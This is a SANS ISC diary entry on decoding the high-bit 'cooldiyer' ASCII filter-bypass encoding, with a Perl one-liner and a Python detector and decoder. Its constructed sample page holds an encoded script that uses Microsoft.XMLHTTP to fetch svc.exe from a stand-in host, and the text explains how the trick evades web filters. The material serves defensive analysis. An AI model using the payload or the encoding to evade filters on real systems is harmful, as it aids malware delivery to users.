
SANS ISC Diary: Decoding Diyer's Ascii bypass


A user wrote in that he was seeing some exploit sites using the "cooldiyer" ASCII encoding for web filtering bypass.
The user's question was: how can I decode these?

Thanks to DanielW, another handler, we have an answer:
"This one is very straightforward to decode - all you have to do is convert it into 7-bit ASCII or clear the highest bit with some Perl-Fu like: cat gamefile.htm | perl -pe 's/(.)/chr(ord($1)&127)/ge'
This is what they do with the HTML line above the code block as well (charset US-ASCII is 7-bit). The decoded URL is a plain ordinary MS.XMLHTTP exploit which tries to download svc.exe, but this file is no longer there."

I do want to warn users: sites using this are mostly BAD sites with malware and exploits on them. Be very careful about any sites you find using this, as they could have an exploit for your web browser/OS that you have no defenses against.
donald
ISC Handler
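The decode step DanielW describes, plus a check for the pattern it depends on (a page that declares charset=US-ASCII yet is mostly bytes with the high bit set), as an added example in Python. This is not DanielW's Perl one-liner and not code from the original diary. The sample page, its charset meta tag and the script body it hides are constructed here for illustration; example.invalid is a reserved hostname and the svc.exe URL is a stand-in, not the one from the reported site. Because clearing bit 7 on a byte that is already 7-bit is a no-op, the whole page can be run through the decoder; the check exists because the same operation would destroy legitimate UTF-8 or code-page text on a page that honestly declares an 8-bit charset.

```python
import re
from typing import Optional

# Charset declared in a <meta http-equiv="Content-Type"> tag (or a raw header).
CHARSET_RE = re.compile(rb'charset\s*=\s*["\']?([A-Za-z0-9_-]+)', re.IGNORECASE)


def encode_high_bit(data: bytes) -> bytes:
    """Set bit 7 on every byte: the transformation the obfuscated pages apply
    to a 7-bit ASCII source. Only round-trips for input bytes below 0x80."""
    return bytes(b | 0x80 for b in data)


def decode_high_bit(data: bytes) -> bytes:
    """Clear bit 7 on every byte, the same thing as
    perl -pe 's/(.)/chr(ord($1)&127)/ge'. Bytes already below 0x80 are unchanged."""
    return bytes(b & 0x7F for b in data)


def high_bit_fraction(data: bytes) -> float:
    """Fraction of bytes in data that have bit 7 set."""
    if not data:
        return 0.0
    return sum(1 for b in data if b & 0x80) / len(data)


def declared_charset(page: bytes) -> Optional[bytes]:
    """Lower-cased charset name the page declares, or None if it declares none."""
    m = CHARSET_RE.search(page)
    return m.group(1).lower() if m else None


def looks_like_high_bit_bypass(page: bytes, min_fraction: float = 0.25) -> bool:
    """True when the page declares a 7-bit charset but a large share of its bytes
    are 8-bit. A page declaring UTF-8 or a Windows code page legitimately carries
    high-bit bytes, so it is not flagged and must not be fed to decode_high_bit."""
    cs = declared_charset(page)
    if cs not in (b"us-ascii", b"ascii"):
        return False
    return high_bit_fraction(page) >= min_fraction


# Constructed sample (hypothetical page, not captured from any real site).
HEADER = (b'<html><head><meta http-equiv="Content-Type" '
          b'content="text/html; charset=US-ASCII"></head><body>\n')
PAYLOAD = (b'<script>var x=new ActiveXObject("Microsoft.XMLHTTP");'
           b'x.open("GET","http://example.invalid/svc.exe",false);x.send();</script>\n')
TRAILER = b'</body></html>'
# The header stays plain ASCII so the browser picks the 7-bit charset; the
# script body is what the obfuscator hides from a filter that does not
# apply the charset before scanning.
SAMPLE_PAGE = HEADER + encode_high_bit(PAYLOAD) + TRAILER


if __name__ == "__main__":
    flagged = looks_like_high_bit_bypass(SAMPLE_PAGE)
    print("declared charset:", declared_charset(SAMPLE_PAGE))
    print("high-bit fraction: %.2f" % high_bit_fraction(SAMPLE_PAGE))
    print("flagged as bypass:", flagged)
    if flagged:
        print(decode_high_bit(SAMPLE_PAGE).decode("ascii"))
```

On a real capture, run the check first and only decode pages it flags; a page declaring UTF-8 with a high-bit fraction of a few percent is ordinary non-English text, not this trick.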
